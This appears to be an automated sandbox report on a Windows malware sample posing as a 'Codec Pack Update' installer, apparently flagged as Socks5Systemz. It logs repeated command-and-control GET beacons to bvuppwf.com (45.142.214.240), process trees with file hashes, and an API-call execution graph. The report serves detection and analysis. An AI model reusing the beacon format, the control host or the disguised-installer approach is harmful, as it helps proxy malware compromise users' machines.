                                                                        TimestampBytes transferredDirectionData
                                                                        Mar 29, 2024 12:59:50.109189034 CET326OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1
                                                                        Host: bvuppwf.com
                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                        Mar 29, 2024 12:59:50.411803961 CET220INHTTP/1.1 200 OK
                                                                        Server: nginx/1.20.1
                                                                        Date: Fri, 29 Mar 2024 11:59:50 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        X-Powered-By: PHP/7.4.33
                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: e67b680813008c20


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        65192.168.2.44980545.142.214.240807084C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Mar 29, 2024 12:59:50.746015072 CET326OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1
                                                                        Host: bvuppwf.com
                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                        Mar 29, 2024 12:59:51.042684078 CET220INHTTP/1.1 200 OK
                                                                        Server: nginx/1.20.1
                                                                        Date: Fri, 29 Mar 2024 11:59:50 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        X-Powered-By: PHP/7.4.33
                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: e67b680813008c20
                                                                        Mar 29, 2024 12:59:51.153063059 CET326OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1
                                                                        Host: bvuppwf.com
                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                        Mar 29, 2024 12:59:51.456732988 CET220INHTTP/1.1 200 OK
                                                                        Server: nginx/1.20.1
                                                                        Date: Fri, 29 Mar 2024 11:59:51 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        X-Powered-By: PHP/7.4.33
                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: e67b680813008c20


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        66192.168.2.44980645.142.214.240807084C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Mar 29, 2024 12:59:51.794274092 CET326OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1
                                                                        Host: bvuppwf.com
                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                        Mar 29, 2024 12:59:52.092668056 CET220INHTTP/1.1 200 OK
                                                                        Server: nginx/1.20.1
                                                                        Date: Fri, 29 Mar 2024 11:59:51 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        X-Powered-By: PHP/7.4.33
                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: e67b680813008c20
                                                                        Mar 29, 2024 12:59:52.205310106 CET326OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1
                                                                        Host: bvuppwf.com
                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                        Mar 29, 2024 12:59:52.510409117 CET220INHTTP/1.1 200 OK
                                                                        Server: nginx/1.20.1
                                                                        Date: Fri, 29 Mar 2024 11:59:52 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        X-Powered-By: PHP/7.4.33
                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: e67b680813008c20


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        67192.168.2.44980745.142.214.240807084C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Mar 29, 2024 12:59:52.843293905 CET326OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1
                                                                        Host: bvuppwf.com
                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                        Mar 29, 2024 12:59:53.149842978 CET220INHTTP/1.1 200 OK
                                                                        Server: nginx/1.20.1
                                                                        Date: Fri, 29 Mar 2024 11:59:53 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        X-Powered-By: PHP/7.4.33
                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: e67b680813008c20


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        68192.168.2.44980845.142.214.240807084C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Mar 29, 2024 12:59:53.482568979 CET326OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1
                                                                        Host: bvuppwf.com
                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                        Mar 29, 2024 12:59:53.783272982 CET220INHTTP/1.1 200 OK
                                                                        Server: nginx/1.20.1
                                                                        Date: Fri, 29 Mar 2024 11:59:53 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        X-Powered-By: PHP/7.4.33
                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: e67b680813008c20


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        69192.168.2.44980945.142.214.240807084C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Mar 29, 2024 12:59:54.123874903 CET326OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1
                                                                        Host: bvuppwf.com
                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                        Mar 29, 2024 12:59:54.431598902 CET220INHTTP/1.1 200 OK
                                                                        Server: nginx/1.20.1
                                                                        Date: Fri, 29 Mar 2024 11:59:54 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        X-Powered-By: PHP/7.4.33
                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: e67b680813008c20


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        70192.168.2.44981045.142.214.240807084C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Mar 29, 2024 12:59:54.762451887 CET326OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1
                                                                        Host: bvuppwf.com
                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                        Mar 29, 2024 12:59:55.064431906 CET220INHTTP/1.1 200 OK
                                                                        Server: nginx/1.20.1
                                                                        Date: Fri, 29 Mar 2024 11:59:54 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        X-Powered-By: PHP/7.4.33
                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: e67b680813008c20


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        71192.168.2.44981145.142.214.240807084C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Mar 29, 2024 12:59:55.404428959 CET326OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1
                                                                        Host: bvuppwf.com
                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                        Mar 29, 2024 12:59:55.707166910 CET220INHTTP/1.1 200 OK
                                                                        Server: nginx/1.20.1
                                                                        Date: Fri, 29 Mar 2024 11:59:55 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        X-Powered-By: PHP/7.4.33
                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: e67b680813008c20


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        72192.168.2.44981245.142.214.240807084C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Mar 29, 2024 12:59:56.055876970 CET326OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1
                                                                        Host: bvuppwf.com
                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                        Mar 29, 2024 12:59:56.367341995 CET220INHTTP/1.1 200 OK
                                                                        Server: nginx/1.20.1
                                                                        Date: Fri, 29 Mar 2024 11:59:56 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        X-Powered-By: PHP/7.4.33
                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: e67b680813008c20


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        73192.168.2.44981345.142.214.240807084C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Mar 29, 2024 12:59:56.945214987 CET326OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1
                                                                        Host: bvuppwf.com
                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                        Mar 29, 2024 12:59:57.244874001 CET220INHTTP/1.1 200 OK
                                                                        Server: nginx/1.20.1
                                                                        Date: Fri, 29 Mar 2024 11:59:57 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        X-Powered-By: PHP/7.4.33
                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: e67b680813008c20


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        74192.168.2.44981445.142.214.240807084C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Mar 29, 2024 12:59:59.031291962 CET326OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1
                                                                        Host: bvuppwf.com
                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                        Mar 29, 2024 12:59:59.332313061 CET220INHTTP/1.1 200 OK
                                                                        Server: nginx/1.20.1
                                                                        Date: Fri, 29 Mar 2024 11:59:59 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        X-Powered-By: PHP/7.4.33
                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: e67b680813008c20


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        75192.168.2.44981545.142.214.240807084C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Mar 29, 2024 12:59:59.675457001 CET326OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1
                                                                        Host: bvuppwf.com
                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                        Mar 29, 2024 12:59:59.972255945 CET220INHTTP/1.1 200 OK
                                                                        Server: nginx/1.20.1
                                                                        Date: Fri, 29 Mar 2024 11:59:59 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        X-Powered-By: PHP/7.4.33
                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: e67b680813008c20


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        76192.168.2.44981645.142.214.240807084C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Mar 29, 2024 13:00:00.317750931 CET326OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1
                                                                        Host: bvuppwf.com
                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                        Mar 29, 2024 13:00:00.622545958 CET220INHTTP/1.1 200 OK
                                                                        Server: nginx/1.20.1
                                                                        Date: Fri, 29 Mar 2024 12:00:00 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        X-Powered-By: PHP/7.4.33
                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: e67b680813008c20


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        77192.168.2.44981745.142.214.240807084C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Mar 29, 2024 13:00:01.144442081 CET326OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1
                                                                        Host: bvuppwf.com
                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                        Mar 29, 2024 13:00:01.452119112 CET220INHTTP/1.1 200 OK
                                                                        Server: nginx/1.20.1
                                                                        Date: Fri, 29 Mar 2024 12:00:01 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        X-Powered-By: PHP/7.4.33
                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: e67b680813008c20


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        78192.168.2.44981845.142.214.240807084C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Mar 29, 2024 13:00:01.795964956 CET326OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1
                                                                        Host: bvuppwf.com
                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                        Mar 29, 2024 13:00:02.097373009 CET220INHTTP/1.1 200 OK
                                                                        Server: nginx/1.20.1
                                                                        Date: Fri, 29 Mar 2024 12:00:01 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        X-Powered-By: PHP/7.4.33
                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: e67b680813008c20


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        79192.168.2.44981945.142.214.240807084C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Mar 29, 2024 13:00:02.442250967 CET326OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1
                                                                        Host: bvuppwf.com
                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                        Mar 29, 2024 13:00:02.749161005 CET220INHTTP/1.1 200 OK
                                                                        Server: nginx/1.20.1
                                                                        Date: Fri, 29 Mar 2024 12:00:02 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        X-Powered-By: PHP/7.4.33
                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: e67b680813008c20


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        80192.168.2.44982045.142.214.240807084C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Mar 29, 2024 13:00:03.080619097 CET326OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992824d875a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3ace6a9216 HTTP/1.1
                                                                        Host: bvuppwf.com
                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                        Mar 29, 2024 13:00:03.385246992 CET220INHTTP/1.1 200 OK
                                                                        Server: nginx/1.20.1
                                                                        Date: Fri, 29 Mar 2024 12:00:03 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: keep-alive
                                                                        X-Powered-By: PHP/7.4.33
                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: e67b680813008c20


                                                                        Statistics

                                                                        CPU Usage

                                                                        Click to jump to process

                                                                        Memory Usage

                                                                        Click to jump to process

                                                                        High Level Behavior Distribution

                                                                        Click to dive into process behavior distribution

                                                                        Behavior

                                                                        Click to jump to process

                                                                        System Behavior

                                                                        General

                                                                        Target ID:0
                                                                        Start time:12:57:56
                                                                        Start date:29/03/2024
                                                                        Path:C:\Users\user\Desktop\0RWRPBSuDx.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:"C:\Users\user\Desktop\0RWRPBSuDx.exe"
                                                                        Imagebase:0x400000
                                                                        File size:1'954'271 bytes
                                                                        MD5 hash:D19197438A7371BAAAC62FEC8DABB3D7
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:low
                                                                        Has exited:false

                                                                        General

                                                                        Target ID:1
                                                                        Start time:12:57:56
                                                                        Start date:29/03/2024
                                                                        Path:C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmp
                                                                        Wow64 process (32bit):true
                                                                        Commandline:"C:\Users\user\AppData\Local\Temp\is-EDLGI.tmp\0RWRPBSuDx.tmp" /SL5="$20420,1594531,54272,C:\Users\user\Desktop\0RWRPBSuDx.exe"
                                                                        Imagebase:0x400000
                                                                        File size:693'760 bytes
                                                                        MD5 hash:D8E53E1B8EA1B12BC3F40BB9F8B14F38
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Antivirus matches:
                                                                        • Detection: 0%, Virustotal, Browse
                                                                        Reputation:low
                                                                        Has exited:false

                                                                        General

                                                                        Target ID:2
                                                                        Start time:12:57:57
                                                                        Start date:29/03/2024
                                                                        Path:C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:"C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exe" -i
                                                                        Imagebase:0x400000
                                                                        File size:1'765'117 bytes
                                                                        MD5 hash:0E347C627EFDED3BF78AFA21FF8B54D3
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Antivirus matches:
                                                                        • Detection: 100%, Avira
                                                                        • Detection: 100%, Joe Sandbox ML
                                                                        • Detection: 38%, Virustotal, Browse
                                                                        Reputation:low
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:3
                                                                        Start time:12:57:57
                                                                        Start date:29/03/2024
                                                                        Path:C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:"C:\Users\user\AppData\Local\Codec Pack Update\codecpackupdate.exe" -s
                                                                        Imagebase:0x400000
                                                                        File size:1'765'117 bytes
                                                                        MD5 hash:0E347C627EFDED3BF78AFA21FF8B54D3
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_Socks5Systemz, Description: Yara detected Socks5Systemz, Source: 00000003.00000002.2868320795.00000000009F1000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_Socks5Systemz, Description: Yara detected Socks5Systemz, Source: 00000003.00000002.2867940792.0000000000731000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                        Reputation:low
                                                                        Has exited:false

                                                                        Disassembly

                                                                        Reset < >

                                                                          Execution Graph

                                                                          Execution Coverage:21.1%
                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                          Signature Coverage:2.3%
                                                                          Total number of Nodes:1514
                                                                          Total number of Limit Nodes:21
                                                                          execution_graph 5098 409d41 5135 409984 5098->5135 5100 409d46 5142 402f24 5100->5142 5102 409d4b 5103 4096e8 15 API calls 5102->5103 5106 409d50 5103->5106 5104 409da3 5105 4026c4 GetSystemTime 5104->5105 5107 409da8 5105->5107 5106->5104 5109 408cfc LocalAlloc TlsSetValue TlsGetValue TlsGetValue 5106->5109 5108 409254 32 API calls 5107->5108 5110 409db0 5108->5110 5112 409d7f 5109->5112 5111 4031e8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 5110->5111 5113 409dbd 5111->5113 5114 409d87 MessageBoxA 5112->5114 5115 406888 LocalAlloc TlsSetValue TlsGetValue TlsGetValue IsDBCSLeadByte 5113->5115 5114->5104 5117 409d94 5114->5117 5116 409dca 5115->5116 5118 406620 LocalAlloc TlsSetValue TlsGetValue TlsGetValue IsDBCSLeadByte 5116->5118 5119 4057b4 LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 5117->5119 5120 409dda 5118->5120 5119->5104 5121 406598 LocalAlloc TlsSetValue TlsGetValue TlsGetValue CharPrevA 5120->5121 5122 409deb 5121->5122 5123 403340 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 5122->5123 5124 409df9 5123->5124 5125 4031e8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 5124->5125 5126 409e09 5125->5126 5127 407440 23 API calls 5126->5127 5128 409e48 5127->5128 5129 402594 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 5128->5129 5130 409e68 5129->5130 5131 40794c LocalAlloc TlsSetValue TlsGetValue TlsGetValue InterlockedExchange 5130->5131 5132 409eaa 5131->5132 5133 407bdc 23 API calls 5132->5133 5134 409ed1 5133->5134 5136 4099a5 5135->5136 5137 40998d 5135->5137 5139 4057e0 4 API calls 5136->5139 5147 4057e0 5137->5147 5141 4099b6 5139->5141 5140 40999f 5140->5100 5141->5100 5143 403154 4 API calls 5142->5143 5144 402f29 5143->5144 5183 402bcc 5144->5183 5146 402f51 5146->5146 5148 4057e7 5147->5148 5151 4031e8 5148->5151 5152 4031ec 5151->5152 5153 4031fc 5151->5153 5152->5153 5157 403254 5152->5157 5154 403228 5153->5154 5162 4025ac 5153->5162 5154->5140 5158 403274 5157->5158 5159 403258 5157->5159 5158->5153 5166 402594 5159->5166 5161 403261 5161->5153 5163 4025b0 5162->5163 5164 4025ba 5162->5164 5163->5164 5165 403154 4 API calls 5163->5165 5164->5154 5164->5164 5165->5164 5167 402598 5166->5167 5168 4025a2 5166->5168 5167->5168 5170 403154 5167->5170 5168->5161 5168->5168 5171 403164 5170->5171 5172 40318c TlsGetValue 5170->5172 5171->5168 5173 403196 5172->5173 5174 40316f 5172->5174 5173->5168 5178 40310c 5174->5178 5176 403174 TlsGetValue 5177 403184 5176->5177 5177->5168 5179 403120 LocalAlloc 5178->5179 5180 403116 5178->5180 5181 40313e TlsSetValue 5179->5181 5182 403132 5179->5182 5180->5179 5181->5182 5182->5176 5184 402bd5 RaiseException 5183->5184 5185 402be6 5183->5185 5184->5185 5185->5146 6184 408f42 6185 408f34 6184->6185 6186 408ed0 Wow64RevertWow64FsRedirection 6185->6186 6187 408f3c 